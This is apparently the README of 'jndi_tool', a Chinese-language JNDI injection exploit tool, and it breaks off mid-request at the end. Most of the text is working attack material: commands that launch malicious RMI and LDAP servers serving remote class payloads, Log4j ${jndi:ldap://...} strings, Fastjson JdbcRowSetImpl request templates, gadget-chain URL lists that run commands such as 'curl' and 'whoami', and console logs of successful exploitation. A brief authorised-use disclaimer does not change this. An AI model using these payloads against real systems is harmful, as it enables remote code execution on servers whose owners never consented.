JNDI-Inject-Exploit

# jndi_tool ``` 声明： 此工具仅用于企业安全人员自查验证自身企业资产的安全风险，或有合法授权的安全测试，请勿用于其他用途，如有，后果自负。 download_url : https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.jar > java -jar jndi_tool.jar Usage: jndi_http: java -cp jndi_tool.jar jndi.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp jndi_tool.jar jndi.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" rmi_high_jdk: java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 "curl dnslog.wyzxxz.cn" el-win/el-linux/groovy ldap_normal: java -cp jndi_tool.jar jndi.LDAPRefServer 1099 host=127.0.0.1 ldap_auto: java -cp jndi_tool.jar jndi.LDAPRefServerAuto 127.0.0.1 1099 80 file=filename (param_format: __JNDI__) fastjson: java -cp jndi_tool.jar jndi.fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex chunk=on java -cp jndi_tool.jar jndi.fastjson.BCELEncode "curl dnslog.wyzxxz.cn" java -cp jndi_tool.jar jndi.fastjson.Tamper "{\"abc\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1099/Object\",\"autoCommit\":true}}" log4j: java -cp jndi_tool.jar jndi.log4j.HLDAPLog4j 127.0.0.1 80 "whoami" http://target w=tomcat/groory/http default:http java -cp jndi_tool.jar jndi.log4j.Tamper "${jndi:ldap://127.0.0.1/a}" all=true random=true java -cp jndi_tool.jar jndi.log4j.Log4j 127.0.0.1 80 url=http://xx.xx or urls=1.txt thread=10 log4j检测，建议用 0 或者 4 的payload ,相对通用一些 新增的 jndi.LDAPRefServerAuto 示例 > cat request1.txt GET /${jndi:__JNDI__} HTTP/1.1 Host: xx.xx.xx.xx Accept: \${jndi:__JNDI__} > java -cp jndi_tool.jar jndi.LDAPRefServerAuto xx.xx.xx.xx 1099 80 file=request1.txt or > java -cp jndi_tool.jar jndi.LDAPRefServerAuto xx.xx.xx.xx 1099 80 url="http://xx.xx.xx/\${jndi:__JNDI__}" headers="Accept: \${jndi:__JNDI__}" [-] url: http://xx.xx.xx/${jndi:__JNDI__} [-] process headers: {Accept=${jndi:__JNDI__}} [-] use: ldap://xx.xx.xx:1099/JNDIObject [-] url: http://xx.xx.xx/${jndi:ldap://xx.xx.xx:1099/JNDIObject} [-] LDAP Listening on xx.xx.xx:1099 [-] get request delay time, waiting... [-] use waiting time: 1000 [-] checking CommonsBeanutils2 [-] checking CommonsCollections8 [-] checking CommonsCollections10 [-] checking CommonsCollectionsK1 [-] checking CommonsCollectionsK2 [-] checking CommonsCollectionsK3 [-] checking CommonsCollectionsK4 [-] checking CommonsBeanutils1 [*] find: CommonsBeanutils1 can be use [-] checking CommonsCollections1 [-] checking CommonsCollections2 [-] checking CommonsCollections3 [-] checking CommonsCollections5 [-] checking CommonsCollections6 [-] checking CommonsCollections7 [-] checking CommonsCollections9 [-] checking Groovy1 [-] checking JSON1 [*] find: JSON1 can be use [-] checking Jdk7u21 [-] checking Spring1 [-] checking Spring2 [-] checking el waiting ... retrying ... [*] find: el can be use 0. CommonsBeanutils1 1. JSON1 2. el [-] please choose gadget, enter q or quit to quit, > 0 * example: curl x.xx , bash=curl `whoami`.x.xx [-] please enter command, enter q or quit to quit, > curl x.dnslog [-] please enter command, enter q or quit to quit, > back 0. CommonsBeanutils1 1. JSON1 2. el [-] please choose gadget, enter q or quit to quit, > 2 * example: curl x.xx , bash=curl `whoami`.x.xx [-] please enter command, enter q or quit to quit, > curl x.dnslog [-] please enter command, enter q or quit to quit, > q ============================================================================= [root@ /]# java -cp jndi_tool.jar jndi.HRMIServer xx.xx.xx.xx 80 "curl dnslog.wyzxxz.cn" [-] Opening JRMP listener on 80 [-] Have connection from /xx.xx.xx.xx:33543 [-] Reading message... [-] Is RMI.lookup call for Exploit 2 [-] Sending remote classloading stub targeting http://xx.xx.xx.xx:80/Object.class [-] Closing connection [*] Have connection from /xx.xx.xx.xx:33544 /Object.class [-] remote target jdk version: java/1.7.0_79, use payload version: jdk7 [-] send payload done and exit. [root@ /]# java -cp jndi_tool.jar jndi.HLDAPServer xx.xx.xx.xx 80 "curl dnslog.wyzxxz.cn" [-] LDAP Listening on 0.0.0.0:80 [*] Send LDAP reference result for Exploit redirecting to http://xx.xx.xx.xx:80/Object.class [*] Have connection from /xx.xx.xx.xx:33548 /Object.class [-] remote target jdk version: java/1.7.0_79, use payload version: jdk7 [-] remote target jdk version: java/1.7.0_79, use payload version: jdk7 [-] send payload done and exit. ============================================================================= rmi: 1. 启动RMI服务，后面写要执行的语句 java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "curl dnslog.wyzxxz.cn" 2. 发送请求包 POST /test HTTP/1.1 Host: 127.0.0.1 Content-Type: application/json Accept-Encoding: gzip, deflate Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true} 3. 查看日志是否curl成功 ============================================================================= ldap: 1. 启动LDAP服务，后面写要执行的语句 java -cp jndi_tool.jar jndi.HLDAPServer xx.xx.xx.xx 80 "curl dnslog.wyzxxz.cn" 2. 发送请求包 POST /test HTTP/1.1 Host: 127.0.0.1 Content-Type: application/json Accept-Encoding: gzip, deflate Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xx.xx.xx.xx:80/Object","autoCommit":true} 3. 查看日志是否执行成功 ============================================================================= ldap: 1. 启动LDAP服务，后面写要执行的语句 > java -cp jndi_tool.jar jndi.LDAPRefServer 1099 host="0.0.0.0" [-] Payloads: CommonsBeanutils1-2,CommonsCollections1-10,CommonsCollectionsK1-4,Groovy1,Clojure,JSON1,Spring1-2,URLDNS,file,tomcat,groovy [-] etc: ldap://0.0.0.0:1099/CommonsBeanutils1/curl x.cn [-] etc: ldap://0.0.0.0:1099/CommonsCollections1/bash=ping x.cn [-] etc: ldap://0.0.0.0:1099/URLDNS/x.cn [-] etc: ldap://0.0.0.0:1099/file/base64data_filename [-] etc: ldap://0.0.0.0:1099/el/whomai [-] etc: ldap://0.0.0.0:1099/groovy/whomai [-] etc: ldap://0.0.0.0:1099/mlet/http://xx.xx [-] etc: ldap://0.0.0.0:1099/groovyload/http://xx.xx [-] etc: ldap://0.0.0.0:1099/snakeyaml/http://xx.xx/x.jar [-] etc: ldap://0.0.0.0:1099/xstream/curl x.dns [-] etc: ldap://0.0.0.0:1099/mvel/whoami [-] etc: ldap://0.0.0.0:1099/loadlib//tmp/nativeLib_name [-] etc: ldap://0.0.0.0:1099/tomcatxxe/http://xx.xx/xxe.xml jdbc: [-] etc: ldap://0.0.0.0:1099/tomcatdbcp/whoami [-] etc: ldap://0.0.0.0:1099/tomcatdbcp2/whoami [-] etc: ldap://0.0.0.0:1099/commondbcp/whoami [-] etc: ldap://0.0.0.0:1099/commondbcp2/whoami [-] etc: ldap://0.0.0.0:1099/tomcatjdbc/whoami [-] etc: ldap://0.0.0.0:1099/druidjdbc/whoami 2. 发送请求包 POST /test HTTP/1.1 Host: 127.0.0.1 Content-Type: application/json Accept-Encoding: gzip, deflate Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xx.xx.xx.xx:1099/CommonsCollections1/curl x.com","autoCommit":true} 3. 查看日志是否执行成功 ============================================================================= fastjson: > java -cp jndi_tool.jar jndi.fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename filename为请求包，需要插入fastjson攻击语句的地方，用__PAYLOAD__代替。示例： POST /fastjson_demo HTTP/1.1 Host: xx.xx.xx.xx Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type